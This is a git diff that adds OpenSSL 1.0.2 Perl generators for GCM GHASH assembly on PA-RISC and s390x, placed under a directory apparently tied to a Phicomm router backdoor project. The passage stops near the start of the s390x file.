+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# April 2010
+#
+# The module implements "4-bit" GCM GHASH function and underlying
+# single multiplication operation in GF(2^128). "4-bit" means that it
+# uses 256 bytes per-key table [+128 bytes shared table]. On PA-7100LC
+# it processes one byte in 19.6 cycles, which is more than twice as
+# fast as code generated by gcc 3.2. PA-RISC 2.0 loop is scheduled for
+# 8 cycles, but measured performance on PA-8600 system is ~9 cycles per
+# processed byte. This is ~2.2x faster than 64-bit code generated by
+# vendor compiler (which used to be very hard to beat:-).
+#
+# Special thanks to polarhome.com for providing HP-UX account.
+
+$flavour = shift;
+$output = shift;
+open STDOUT,">$output";
+
+if ($flavour =~ /64/) {
+	$LEVEL		="2.0W";
+	$SIZE_T		=8;
+	$FRAME_MARKER	=80;
+	$SAVED_RP	=16;
+	$PUSH		="std";
+	$PUSHMA		="std,ma";
+	$POP		="ldd";
+	$POPMB		="ldd,mb";
+	$NREGS		=6;
+} else {
+	$LEVEL		="1.0";	#"\n\t.ALLOW\t2.0";
+	$SIZE_T		=4;
+	$FRAME_MARKER	=48;
+	$SAVED_RP	=20;
+	$PUSH		="stw";
+	$PUSHMA		="stwm";
+	$POP		="ldw";
+	$POPMB		="ldwm";
+	$NREGS		=11;
+}
+
+$FRAME=10*$SIZE_T+$FRAME_MARKER;# NREGS saved regs + frame marker
+				#                 [+ argument transfer]
+
+################# volatile registers
+$Xi="%r26";	# argument block
+$Htbl="%r25";
+$inp="%r24";
+$len="%r23";
+$Hhh=$Htbl;	# variables
+$Hll="%r22";
+$Zhh="%r21";
+$Zll="%r20";
+$cnt="%r19";
+$rem_4bit="%r28";
+$rem="%r29";
+$mask0xf0="%r31";
+
+################# preserved registers
+$Thh="%r1";
+$Tll="%r2";
+$nlo="%r3";
+$nhi="%r4";
+$byte="%r5";
+if ($SIZE_T==4) {
+	$Zhl="%r6";
+	$Zlh="%r7";
+	$Hhl="%r8";
+	$Hlh="%r9";
+	$Thl="%r10";
+	$Tlh="%r11";
+}
+$rem2="%r6";	# used in PA-RISC 2.0 code
+
+$code.=<<___;
+	.LEVEL	$LEVEL
+	.SPACE	\$TEXT\$
+	.SUBSPA	\$CODE\$,QUAD=0,ALIGN=8,ACCESS=0x2C,CODE_ONLY
+
+	.EXPORT	gcm_gmult_4bit,ENTRY,ARGW0=GR,ARGW1=GR
+	.ALIGN	64
+gcm_gmult_4bit
+	.PROC
+	.CALLINFO	FRAME=`$FRAME-10*$SIZE_T`,NO_CALLS,SAVE_RP,ENTRY_GR=$NREGS
+	.ENTRY
+	$PUSH	%r2,-$SAVED_RP(%sp)	; standard prologue
+	$PUSHMA	%r3,$FRAME(%sp)
+	$PUSH	%r4,`-$FRAME+1*$SIZE_T`(%sp)
+	$PUSH	%r5,`-$FRAME+2*$SIZE_T`(%sp)
+	$PUSH	%r6,`-$FRAME+3*$SIZE_T`(%sp)
+___
+$code.=<<___ if ($SIZE_T==4);
+	$PUSH	%r7,`-$FRAME+4*$SIZE_T`(%sp)
+	$PUSH	%r8,`-$FRAME+5*$SIZE_T`(%sp)
+	$PUSH	%r9,`-$FRAME+6*$SIZE_T`(%sp)
+	$PUSH	%r10,`-$FRAME+7*$SIZE_T`(%sp)
+	$PUSH	%r11,`-$FRAME+8*$SIZE_T`(%sp)
+___
+$code.=<<___;
+	blr	%r0,$rem_4bit
+	ldi	3,$rem
+L\$pic_gmult
+	andcm	$rem_4bit,$rem,$rem_4bit
+	addl	$inp,$len,$len
+	ldo	L\$rem_4bit-L\$pic_gmult($rem_4bit),$rem_4bit
+	ldi	0xf0,$mask0xf0
+___
+$code.=<<___ if ($SIZE_T==4);
+	ldi	31,$rem
+	mtctl	$rem,%cr11
+	extrd,u,*= $rem,%sar,1,$rem	; executes on PA-RISC 1.0
+	b	L\$parisc1_gmult
+	nop
+___
+
+$code.=<<___;
+	ldb	15($Xi),$nlo
+	ldo	8($Htbl),$Hll
+
+	and	$mask0xf0,$nlo,$nhi
+	depd,z	$nlo,59,4,$nlo
+
+	ldd	$nlo($Hll),$Zll
+	ldd	$nlo($Hhh),$Zhh
+
+	depd,z	$Zll,60,4,$rem
+	shrpd	$Zhh,$Zll,4,$Zll
+	extrd,u	$Zhh,59,60,$Zhh
+	ldb	14($Xi),$nlo
+
+	ldd	$nhi($Hll),$Tll
+	ldd	$nhi($Hhh),$Thh
+	and	$mask0xf0,$nlo,$nhi
+	depd,z	$nlo,59,4,$nlo
+
+	xor	$Tll,$Zll,$Zll
+	xor	$Thh,$Zhh,$Zhh
+	ldd	$rem($rem_4bit),$rem
+	b	L\$oop_gmult_pa2
+	ldi	13,$cnt
+
+	.ALIGN	8
+L\$oop_gmult_pa2
+	xor	$rem,$Zhh,$Zhh		; moved here to work around gas bug
+	depd,z	$Zll,60,4,$rem
+
+	shrpd	$Zhh,$Zll,4,$Zll
+	extrd,u	$Zhh,59,60,$Zhh
+	ldd	$nlo($Hll),$Tll
+	ldd	$nlo($Hhh),$Thh
+
+	xor	$Tll,$Zll,$Zll
+	xor	$Thh,$Zhh,$Zhh
+	ldd	$rem($rem_4bit),$rem
+
+	xor	$rem,$Zhh,$Zhh
+	depd,z	$Zll,60,4,$rem
+	ldbx	$cnt($Xi),$nlo
+
+	shrpd	$Zhh,$Zll,4,$Zll
+	extrd,u	$Zhh,59,60,$Zhh
+	ldd	$nhi($Hll),$Tll
+	ldd	$nhi($Hhh),$Thh
+
+	and	$mask0xf0,$nlo,$nhi
+	depd,z	$nlo,59,4,$nlo
+	ldd	$rem($rem_4bit),$rem
+
+	xor	$Tll,$Zll,$Zll
+	addib,uv -1,$cnt,L\$oop_gmult_pa2
+	xor	$Thh,$Zhh,$Zhh
+
+	xor	$rem,$Zhh,$Zhh
+	depd,z	$Zll,60,4,$rem
+
+	shrpd	$Zhh,$Zll,4,$Zll
+	extrd,u	$Zhh,59,60,$Zhh
+	ldd	$nlo($Hll),$Tll
+	ldd	$nlo($Hhh),$Thh
+
+	xor	$Tll,$Zll,$Zll
+	xor	$Thh,$Zhh,$Zhh
+	ldd	$rem($rem_4bit),$rem
+
+	xor	$rem,$Zhh,$Zhh
+	depd,z	$Zll,60,4,$rem
+
+	shrpd	$Zhh,$Zll,4,$Zll
+	extrd,u	$Zhh,59,60,$Zhh
+	ldd	$nhi($Hll),$Tll
+	ldd	$nhi($Hhh),$Thh
+
+	xor	$Tll,$Zll,$Zll
+	xor	$Thh,$Zhh,$Zhh
+	ldd	$rem($rem_4bit),$rem
+
+	xor	$rem,$Zhh,$Zhh
+	std	$Zll,8($Xi)
+	std	$Zhh,0($Xi)
+___
+
+$code.=<<___ if ($SIZE_T==4);
+	b	L\$done_gmult
+	nop
+
+L\$parisc1_gmult
+	ldb	15($Xi),$nlo
+	ldo	12($Htbl),$Hll
+	ldo	8($Htbl),$Hlh
+	ldo	4($Htbl),$Hhl
+
+	and	$mask0xf0,$nlo,$nhi
+	zdep	$nlo,27,4,$nlo
+
+	ldwx	$nlo($Hll),$Zll
+	ldwx	$nlo($Hlh),$Zlh
+	ldwx	$nlo($Hhl),$Zhl
+	ldwx	$nlo($Hhh),$Zhh
+	zdep	$Zll,28,4,$rem
+	ldb	14($Xi),$nlo
+	ldwx	$rem($rem_4bit),$rem
+	shrpw	$Zlh,$Zll,4,$Zll
+	ldwx	$nhi($Hll),$Tll
+	shrpw	$Zhl,$Zlh,4,$Zlh
+	ldwx	$nhi($Hlh),$Tlh
+	shrpw	$Zhh,$Zhl,4,$Zhl
+	ldwx	$nhi($Hhl),$Thl
+	extru	$Zhh,27,28,$Zhh
+	ldwx	$nhi($Hhh),$Thh
+	xor	$rem,$Zhh,$Zhh
+	and	$mask0xf0,$nlo,$nhi
+	zdep	$nlo,27,4,$nlo
+
+	xor	$Tll,$Zll,$Zll
+	ldwx	$nlo($Hll),$Tll
+	xor	$Tlh,$Zlh,$Zlh
+	ldwx	$nlo($Hlh),$Tlh
+	xor	$Thl,$Zhl,$Zhl
+	b	L\$oop_gmult_pa1
+	ldi	13,$cnt
+
+	.ALIGN	8
+L\$oop_gmult_pa1
+	zdep	$Zll,28,4,$rem
+	ldwx	$nlo($Hhl),$Thl
+	xor	$Thh,$Zhh,$Zhh
+	ldwx	$rem($rem_4bit),$rem
+	shrpw	$Zlh,$Zll,4,$Zll
+	ldwx	$nlo($Hhh),$Thh
+	shrpw	$Zhl,$Zlh,4,$Zlh
+	ldbx	$cnt($Xi),$nlo
+	xor	$Tll,$Zll,$Zll
+	ldwx	$nhi($Hll),$Tll
+	shrpw	$Zhh,$Zhl,4,$Zhl
+	xor	$Tlh,$Zlh,$Zlh
+	ldwx	$nhi($Hlh),$Tlh
+	extru	$Zhh,27,28,$Zhh
+	xor	$Thl,$Zhl,$Zhl
+	ldwx	$nhi($Hhl),$Thl
+	xor	$rem,$Zhh,$Zhh
+	zdep	$Zll,28,4,$rem
+	xor	$Thh,$Zhh,$Zhh
+	ldwx	$nhi($Hhh),$Thh
+	shrpw	$Zlh,$Zll,4,$Zll
+	ldwx	$rem($rem_4bit),$rem
+	shrpw	$Zhl,$Zlh,4,$Zlh
+	shrpw	$Zhh,$Zhl,4,$Zhl
+	and	$mask0xf0,$nlo,$nhi
+	extru	$Zhh,27,28,$Zhh
+	zdep	$nlo,27,4,$nlo
+	xor	$Tll,$Zll,$Zll
+	ldwx	$nlo($Hll),$Tll
+	xor	$Tlh,$Zlh,$Zlh
+	ldwx	$nlo($Hlh),$Tlh
+	xor	$rem,$Zhh,$Zhh
+	addib,uv -1,$cnt,L\$oop_gmult_pa1
+	xor	$Thl,$Zhl,$Zhl
+
+	zdep	$Zll,28,4,$rem
+	ldwx	$nlo($Hhl),$Thl
+	xor	$Thh,$Zhh,$Zhh
+	ldwx	$rem($rem_4bit),$rem
+	shrpw	$Zlh,$Zll,4,$Zll
+	ldwx	$nlo($Hhh),$Thh
+	shrpw	$Zhl,$Zlh,4,$Zlh
+	xor	$Tll,$Zll,$Zll
+	ldwx	$nhi($Hll),$Tll
+	shrpw	$Zhh,$Zhl,4,$Zhl
+	xor	$Tlh,$Zlh,$Zlh
+	ldwx	$nhi($Hlh),$Tlh
+	extru	$Zhh,27,28,$Zhh
+	xor	$rem,$Zhh,$Zhh
+	xor	$Thl,$Zhl,$Zhl
+	ldwx	$nhi($Hhl),$Thl
+	xor	$Thh,$Zhh,$Zhh
+	ldwx	$nhi($Hhh),$Thh
+	zdep	$Zll,28,4,$rem
+	ldwx	$rem($rem_4bit),$rem
+	shrpw	$Zlh,$Zll,4,$Zll
+	shrpw	$Zhl,$Zlh,4,$Zlh
+	shrpw	$Zhh,$Zhl,4,$Zhl
+	extru	$Zhh,27,28,$Zhh
+	xor	$Tll,$Zll,$Zll
+	xor	$Tlh,$Zlh,$Zlh
+	xor	$rem,$Zhh,$Zhh
+	stw	$Zll,12($Xi)
+	xor	$Thl,$Zhl,$Zhl
+	stw	$Zlh,8($Xi)
+	xor	$Thh,$Zhh,$Zhh
+	stw	$Zhl,4($Xi)
+	stw	$Zhh,0($Xi)
+___
+$code.=<<___;
+L\$done_gmult
+	$POP	`-$FRAME-$SAVED_RP`(%sp),%r2		; standard epilogue
+	$POP	`-$FRAME+1*$SIZE_T`(%sp),%r4
+	$POP	`-$FRAME+2*$SIZE_T`(%sp),%r5
+	$POP	`-$FRAME+3*$SIZE_T`(%sp),%r6
+___
+$code.=<<___ if ($SIZE_T==4);
+	$POP	`-$FRAME+4*$SIZE_T`(%sp),%r7
+	$POP	`-$FRAME+5*$SIZE_T`(%sp),%r8
+	$POP	`-$FRAME+6*$SIZE_T`(%sp),%r9
+	$POP	`-$FRAME+7*$SIZE_T`(%sp),%r10
+	$POP	`-$FRAME+8*$SIZE_T`(%sp),%r11
+___
+$code.=<<___;
+	bv	(%r2)
+	.EXIT
+	$POPMB	-$FRAME(%sp),%r3
+	.PROCEND
+
+	.EXPORT	gcm_ghash_4bit,ENTRY,ARGW0=GR,ARGW1=GR,ARGW2=GR,ARGW3=GR
+	.ALIGN	64
+gcm_ghash_4bit
+	.PROC
+	.CALLINFO	FRAME=`$FRAME-10*$SIZE_T`,NO_CALLS,SAVE_RP,ENTRY_GR=11
+	.ENTRY
+	$PUSH	%r2,-$SAVED_RP(%sp)	; standard prologue
+	$PUSHMA	%r3,$FRAME(%sp)
+	$PUSH	%r4,`-$FRAME+1*$SIZE_T`(%sp)
+	$PUSH	%r5,`-$FRAME+2*$SIZE_T`(%sp)
+	$PUSH	%r6,`-$FRAME+3*$SIZE_T`(%sp)
+___
+$code.=<<___ if ($SIZE_T==4);
+	$PUSH	%r7,`-$FRAME+4*$SIZE_T`(%sp)
+	$PUSH	%r8,`-$FRAME+5*$SIZE_T`(%sp)
+	$PUSH	%r9,`-$FRAME+6*$SIZE_T`(%sp)
+	$PUSH	%r10,`-$FRAME+7*$SIZE_T`(%sp)
+	$PUSH	%r11,`-$FRAME+8*$SIZE_T`(%sp)
+___
+$code.=<<___;
+	blr	%r0,$rem_4bit
+	ldi	3,$rem
+L\$pic_ghash
+	andcm	$rem_4bit,$rem,$rem_4bit
+	addl	$inp,$len,$len
+	ldo	L\$rem_4bit-L\$pic_ghash($rem_4bit),$rem_4bit
+	ldi	0xf0,$mask0xf0
+___
+$code.=<<___ if ($SIZE_T==4);
+	ldi	31,$rem
+	mtctl	$rem,%cr11
+	extrd,u,*= $rem,%sar,1,$rem	; executes on PA-RISC 1.0
+	b	L\$parisc1_ghash
+	nop
+___
+
+$code.=<<___;
+	ldb	15($Xi),$nlo
+	ldo	8($Htbl),$Hll
+
+L\$outer_ghash_pa2
+	ldb	15($inp),$nhi
+	xor	$nhi,$nlo,$nlo
+	and	$mask0xf0,$nlo,$nhi
+	depd,z	$nlo,59,4,$nlo
+
+	ldd	$nlo($Hll),$Zll
+	ldd	$nlo($Hhh),$Zhh
+
+	depd,z	$Zll,60,4,$rem
+	shrpd	$Zhh,$Zll,4,$Zll
+	extrd,u	$Zhh,59,60,$Zhh
+	ldb	14($Xi),$nlo
+	ldb	14($inp),$byte
+
+	ldd	$nhi($Hll),$Tll
+	ldd	$nhi($Hhh),$Thh
+	xor	$byte,$nlo,$nlo
+	and	$mask0xf0,$nlo,$nhi
+	depd,z	$nlo,59,4,$nlo
+
+	xor	$Tll,$Zll,$Zll
+	xor	$Thh,$Zhh,$Zhh
+	ldd	$rem($rem_4bit),$rem
+	b	L\$oop_ghash_pa2
+	ldi	13,$cnt
+
+	.ALIGN	8
+L\$oop_ghash_pa2
+	xor	$rem,$Zhh,$Zhh		; moved here to work around gas bug
+	depd,z	$Zll,60,4,$rem2
+
+	shrpd	$Zhh,$Zll,4,$Zll
+	extrd,u	$Zhh,59,60,$Zhh
+	ldd	$nlo($Hll),$Tll
+	ldd	$nlo($Hhh),$Thh
+
+	xor	$Tll,$Zll,$Zll
+	xor	$Thh,$Zhh,$Zhh
+	ldbx	$cnt($Xi),$nlo
+	ldbx	$cnt($inp),$byte
+
+	depd,z	$Zll,60,4,$rem
+	shrpd	$Zhh,$Zll,4,$Zll
+	ldd	$rem2($rem_4bit),$rem2
+
+	xor	$rem2,$Zhh,$Zhh
+	xor	$byte,$nlo,$nlo
+	ldd	$nhi($Hll),$Tll
+	ldd	$nhi($Hhh),$Thh
+
+	and	$mask0xf0,$nlo,$nhi
+	depd,z	$nlo,59,4,$nlo
+
+	extrd,u	$Zhh,59,60,$Zhh
+	xor	$Tll,$Zll,$Zll
+
+	ldd	$rem($rem_4bit),$rem
+	addib,uv -1,$cnt,L\$oop_ghash_pa2
+	xor	$Thh,$Zhh,$Zhh
+
+	xor	$rem,$Zhh,$Zhh
+	depd,z	$Zll,60,4,$rem2
+
+	shrpd	$Zhh,$Zll,4,$Zll
+	extrd,u	$Zhh,59,60,$Zhh
+	ldd	$nlo($Hll),$Tll
+	ldd	$nlo($Hhh),$Thh
+
+	xor	$Tll,$Zll,$Zll
+	xor	$Thh,$Zhh,$Zhh
+
+	depd,z	$Zll,60,4,$rem
+	shrpd	$Zhh,$Zll,4,$Zll
+	ldd	$rem2($rem_4bit),$rem2
+
+	xor	$rem2,$Zhh,$Zhh
+	ldd	$nhi($Hll),$Tll
+	ldd	$nhi($Hhh),$Thh
+
+	extrd,u	$Zhh,59,60,$Zhh
+	xor	$Tll,$Zll,$Zll
+	xor	$Thh,$Zhh,$Zhh
+	ldd	$rem($rem_4bit),$rem
+
+	xor	$rem,$Zhh,$Zhh
+	std	$Zll,8($Xi)
+	ldo	16($inp),$inp
+	std	$Zhh,0($Xi)
+	cmpb,*<> $inp,$len,L\$outer_ghash_pa2
+	copy	$Zll,$nlo
+___
+
+$code.=<<___ if ($SIZE_T==4);
+	b	L\$done_ghash
+	nop
+
+L\$parisc1_ghash
+	ldb	15($Xi),$nlo
+	ldo	12($Htbl),$Hll
+	ldo	8($Htbl),$Hlh
+	ldo	4($Htbl),$Hhl
+
+L\$outer_ghash_pa1
+	ldb	15($inp),$byte
+	xor	$byte,$nlo,$nlo
+	and	$mask0xf0,$nlo,$nhi
+	zdep	$nlo,27,4,$nlo
+
+	ldwx	$nlo($Hll),$Zll
+	ldwx	$nlo($Hlh),$Zlh
+	ldwx	$nlo($Hhl),$Zhl
+	ldwx	$nlo($Hhh),$Zhh
+	zdep	$Zll,28,4,$rem
+	ldb	14($Xi),$nlo
+	ldb	14($inp),$byte
+	ldwx	$rem($rem_4bit),$rem
+	shrpw	$Zlh,$Zll,4,$Zll
+	ldwx	$nhi($Hll),$Tll
+	shrpw	$Zhl,$Zlh,4,$Zlh
+	ldwx	$nhi($Hlh),$Tlh
+	shrpw	$Zhh,$Zhl,4,$Zhl
+	ldwx	$nhi($Hhl),$Thl
+	extru	$Zhh,27,28,$Zhh
+	ldwx	$nhi($Hhh),$Thh
+	xor	$byte,$nlo,$nlo
+	xor	$rem,$Zhh,$Zhh
+	and	$mask0xf0,$nlo,$nhi
+	zdep	$nlo,27,4,$nlo
+
+	xor	$Tll,$Zll,$Zll
+	ldwx	$nlo($Hll),$Tll
+	xor	$Tlh,$Zlh,$Zlh
+	ldwx	$nlo($Hlh),$Tlh
+	xor	$Thl,$Zhl,$Zhl
+	b	L\$oop_ghash_pa1
+	ldi	13,$cnt
+
+	.ALIGN	8
+L\$oop_ghash_pa1
+	zdep	$Zll,28,4,$rem
+	ldwx	$nlo($Hhl),$Thl
+	xor	$Thh,$Zhh,$Zhh
+	ldwx	$rem($rem_4bit),$rem
+	shrpw	$Zlh,$Zll,4,$Zll
+	ldwx	$nlo($Hhh),$Thh
+	shrpw	$Zhl,$Zlh,4,$Zlh
+	ldbx	$cnt($Xi),$nlo
+	xor	$Tll,$Zll,$Zll
+	ldwx	$nhi($Hll),$Tll
+	shrpw	$Zhh,$Zhl,4,$Zhl
+	ldbx	$cnt($inp),$byte
+	xor	$Tlh,$Zlh,$Zlh
+	ldwx	$nhi($Hlh),$Tlh
+	extru	$Zhh,27,28,$Zhh
+	xor	$Thl,$Zhl,$Zhl
+	ldwx	$nhi($Hhl),$Thl
+	xor	$rem,$Zhh,$Zhh
+	zdep	$Zll,28,4,$rem
+	xor	$Thh,$Zhh,$Zhh
+	ldwx	$nhi($Hhh),$Thh
+	shrpw	$Zlh,$Zll,4,$Zll
+	ldwx	$rem($rem_4bit),$rem
+	shrpw	$Zhl,$Zlh,4,$Zlh
+	xor	$byte,$nlo,$nlo
+	shrpw	$Zhh,$Zhl,4,$Zhl
+	and	$mask0xf0,$nlo,$nhi
+	extru	$Zhh,27,28,$Zhh
+	zdep	$nlo,27,4,$nlo
+	xor	$Tll,$Zll,$Zll
+	ldwx	$nlo($Hll),$Tll
+	xor	$Tlh,$Zlh,$Zlh
+	ldwx	$nlo($Hlh),$Tlh
+	xor	$rem,$Zhh,$Zhh
+	addib,uv -1,$cnt,L\$oop_ghash_pa1
+	xor	$Thl,$Zhl,$Zhl
+
+	zdep	$Zll,28,4,$rem
+	ldwx	$nlo($Hhl),$Thl
+	xor	$Thh,$Zhh,$Zhh
+	ldwx	$rem($rem_4bit),$rem
+	shrpw	$Zlh,$Zll,4,$Zll
+	ldwx	$nlo($Hhh),$Thh
+	shrpw	$Zhl,$Zlh,4,$Zlh
+	xor	$Tll,$Zll,$Zll
+	ldwx	$nhi($Hll),$Tll
+	shrpw	$Zhh,$Zhl,4,$Zhl
+	xor	$Tlh,$Zlh,$Zlh
+	ldwx	$nhi($Hlh),$Tlh
+	extru	$Zhh,27,28,$Zhh
+	xor	$rem,$Zhh,$Zhh
+	xor	$Thl,$Zhl,$Zhl
+	ldwx	$nhi($Hhl),$Thl
+	xor	$Thh,$Zhh,$Zhh
+	ldwx	$nhi($Hhh),$Thh
+	zdep	$Zll,28,4,$rem
+	ldwx	$rem($rem_4bit),$rem
+	shrpw	$Zlh,$Zll,4,$Zll
+	shrpw	$Zhl,$Zlh,4,$Zlh
+	shrpw	$Zhh,$Zhl,4,$Zhl
+	extru	$Zhh,27,28,$Zhh
+	xor	$Tll,$Zll,$Zll
+	xor	$Tlh,$Zlh,$Zlh
+	xor	$rem,$Zhh,$Zhh
+	stw	$Zll,12($Xi)
+	xor	$Thl,$Zhl,$Zhl
+	stw	$Zlh,8($Xi)
+	xor	$Thh,$Zhh,$Zhh
+	stw	$Zhl,4($Xi)
+	ldo	16($inp),$inp
+	stw	$Zhh,0($Xi)
+	comb,<>	$inp,$len,L\$outer_ghash_pa1
+	copy	$Zll,$nlo
+___
+$code.=<<___;
+L\$done_ghash
+	$POP	`-$FRAME-$SAVED_RP`(%sp),%r2		; standard epilogue
+	$POP	`-$FRAME+1*$SIZE_T`(%sp),%r4
+	$POP	`-$FRAME+2*$SIZE_T`(%sp),%r5
+	$POP	`-$FRAME+3*$SIZE_T`(%sp),%r6
+___
+$code.=<<___ if ($SIZE_T==4);
+	$POP	`-$FRAME+4*$SIZE_T`(%sp),%r7
+	$POP	`-$FRAME+5*$SIZE_T`(%sp),%r8
+	$POP	`-$FRAME+6*$SIZE_T`(%sp),%r9
+	$POP	`-$FRAME+7*$SIZE_T`(%sp),%r10
+	$POP	`-$FRAME+8*$SIZE_T`(%sp),%r11
+___
+$code.=<<___;
+	bv	(%r2)
+	.EXIT
+	$POPMB	-$FRAME(%sp),%r3
+	.PROCEND
+
+	.ALIGN	64
+L\$rem_4bit
+	.WORD	`0x0000<<16`,0,`0x1C20<<16`,0,`0x3840<<16`,0,`0x2460<<16`,0
+	.WORD	`0x7080<<16`,0,`0x6CA0<<16`,0,`0x48C0<<16`,0,`0x54E0<<16`,0
+	.WORD	`0xE100<<16`,0,`0xFD20<<16`,0,`0xD940<<16`,0,`0xC560<<16`,0
+	.WORD	`0x9180<<16`,0,`0x8DA0<<16`,0,`0xA9C0<<16`,0,`0xB5E0<<16`,0
+	.STRINGZ "GHASH for PA-RISC, GRYPTOGAMS by <appro\@openssl.org>"
+	.ALIGN	64
+___
+
+# Explicitly encode PA-RISC 2.0 instructions used in this module, so
+# that it can be compiled with .LEVEL 1.0. It should be noted that I
+# wouldn't have to do this, if GNU assembler understood .ALLOW 2.0
+# directive...
+
+my $ldd = sub {
+  my ($mod,$args) = @_;
+  my $orig = "ldd$mod\t$args";
+
+    if ($args =~ /%r([0-9]+)\(%r([0-9]+)\),%r([0-9]+)/)		# format 4
+    {	my $opcode=(0x03<<26)|($2<<21)|($1<<16)|(3<<6)|$3;
+	sprintf "\t.WORD\t0x%08x\t; %s",$opcode,$orig;
+    }
+    elsif ($args =~ /(\-?[0-9]+)\(%r([0-9]+)\),%r([0-9]+)/)	# format 5
+    {	my $opcode=(0x03<<26)|($2<<21)|(1<<12)|(3<<6)|$3;
+	$opcode|=(($1&0xF)<<17)|(($1&0x10)<<12);		# encode offset
+	$opcode|=(1<<5)  if ($mod =~ /^,m/);
+	$opcode|=(1<<13) if ($mod =~ /^,mb/);
+	sprintf "\t.WORD\t0x%08x\t; %s",$opcode,$orig;
+    }
+    else { "\t".$orig; }
+};
+
+my $std = sub {
+  my ($mod,$args) = @_;
+  my $orig = "std$mod\t$args";
+
+    if ($args =~ /%r([0-9]+),(\-?[0-9]+)\(%r([0-9]+)\)/) # format 3 suffices
+    {	my $opcode=(0x1c<<26)|($3<<21)|($1<<16)|(($2&0x1FF8)<<1)|(($2>>13)&1);
+	sprintf "\t.WORD\t0x%08x\t; %s",$opcode,$orig;
+    }
+    else { "\t".$orig; }
+};
+
+my $extrd = sub {
+  my ($mod,$args) = @_;
+  my $orig = "extrd$mod\t$args";
+
+    # I only have ",u" completer, it's implicitly encoded...
+    if ($args =~ /%r([0-9]+),([0-9]+),([0-9]+),%r([0-9]+)/)	# format 15
+    {	my $opcode=(0x36<<26)|($1<<21)|($4<<16);
+	my $len=32-$3;
+	$opcode |= (($2&0x20)<<6)|(($2&0x1f)<<5);		# encode pos
+	$opcode |= (($len&0x20)<<7)|($len&0x1f);		# encode len
+	sprintf "\t.WORD\t0x%08x\t; %s",$opcode,$orig;
+    }
+    elsif ($args =~ /%r([0-9]+),%sar,([0-9]+),%r([0-9]+)/)	# format 12
+    {	my $opcode=(0x34<<26)|($1<<21)|($3<<16)|(2<<11)|(1<<9);
+	my $len=32-$2;
+	$opcode |= (($len&0x20)<<3)|($len&0x1f);		# encode len
+	$opcode |= (1<<13) if ($mod =~ /,\**=/);
+	sprintf "\t.WORD\t0x%08x\t; %s",$opcode,$orig;
+    }
+    else { "\t".$orig; }
+};
+
+my $shrpd = sub {
+  my ($mod,$args) = @_;
+  my $orig = "shrpd$mod\t$args";
+
+    if ($args =~ /%r([0-9]+),%r([0-9]+),([0-9]+),%r([0-9]+)/)	# format 14
+    {	my $opcode=(0x34<<26)|($2<<21)|($1<<16)|(1<<10)|$4;
+	my $cpos=63-$3;
+	$opcode |= (($cpos&0x20)<<6)|(($cpos&0x1f)<<5);		# encode sa
+	sprintf "\t.WORD\t0x%08x\t; %s",$opcode,$orig;
+    }
+    elsif ($args =~ /%r([0-9]+),%r([0-9]+),%sar,%r([0-9]+)/)	# format 11
+    {	sprintf "\t.WORD\t0x%08x\t; %s",
+		(0x34<<26)|($2<<21)|($1<<16)|(1<<9)|$3,$orig;
+    }
+    else { "\t".$orig; }
+};
+
+my $depd = sub {
+  my ($mod,$args) = @_;
+  my $orig = "depd$mod\t$args";
+
+    # I only have ",z" completer, it's impicitly encoded...
+    if ($args =~ /%r([0-9]+),([0-9]+),([0-9]+),%r([0-9]+)/)	# format 16
+    {	my $opcode=(0x3c<<26)|($4<<21)|($1<<16);
+    	my $cpos=63-$2;
+	my $len=32-$3;
+	$opcode |= (($cpos&0x20)<<6)|(($cpos&0x1f)<<5);		# encode pos
+	$opcode |= (($len&0x20)<<7)|($len&0x1f);		# encode len
+	sprintf "\t.WORD\t0x%08x\t; %s",$opcode,$orig;
+    }
+    else { "\t".$orig; }
+};
+
+sub assemble {
+  my ($mnemonic,$mod,$args)=@_;
+  my $opcode = eval("\$$mnemonic");
+
+    ref($opcode) eq 'CODE' ? &$opcode($mod,$args) : "\t$mnemonic$mod\t$args";
+}
+
+foreach (split("\n",$code)) {
+	s/\`([^\`]*)\`/eval $1/ge;
+	if ($SIZE_T==4) {
+		s/^\s+([a-z]+)([\S]*)\s+([\S]*)/&assemble($1,$2,$3)/e;
+		s/cmpb,\*/comb,/;
+		s/,\*/,/;
+	}
+	s/\bbv\b/bve/	if ($SIZE_T==8);
+	print $_,"\n";
+}
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-s390x.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-s390x.pl
new file mode 100644
index 0000000..39096b4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-s390x.pl
@@ -0,0 +1,262 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# September 2010.
+#
+# The module implements "4-bit" GCM GHASH function and underlying
+# single multiplication operation in GF(2^128). "4-bit" means that it
+# uses 256 bytes per-key table [+128 bytes shared table]. Performance
+# was measured to be ~18 cycles per processed byte on z10, which is
+# almost 40% better than gcc-generated code. It should be noted that
+# 18 cycles is worse result than expected: loop is scheduled for 12
+# and the result should be close to 12. In the lack of instruction-
+# level profiling data it's impossible to tell why...
+
+# November 2010.
+#
+# Adapt for -m31 build. If kernel supports what's called "highgprs"
+# feature on Linux [see /proc/cpuinfo], it's possible to use 64-bit
+# instructions and achieve "64-bit" performance even in 31-bit legacy
+# application context. The feature is not specific to any particular
+# processor, as long as it's "z-CPU". Latter implies that the code
+# remains z/Architecture specific. On z990 it was measured to perform
+# 2.8x better than 32-bit code generated by gcc 4.3.
+
+# March 2011.
+#
+# Support for hardware KIMD-GHASH is verified to produce correct
+# result and therefore is engaged. On z196 it was measured to process
+# 8KB buffer ~7 faster than software implementation. It's not as
+# impressive for smaller buffer sizes and for smallest 16-bytes buffer
+# it's actually almost 2 times slower. Which is the reason why
+# KIMD-GHASH is not used in gcm_gmult_4bit.
+
+$flavour = shift;
+
+if ($flavour =~ /3[12]/) {
+	$SIZE_T=4;
+	$g="";
+} else {
+	$SIZE_T=8;
+	$g="g";
+}
+
+while (($output=shift) && ($output!~/^\w[\w\-]*\.\w+$/)) {}
+open STDOUT,">$output";
+
+$softonly=0;
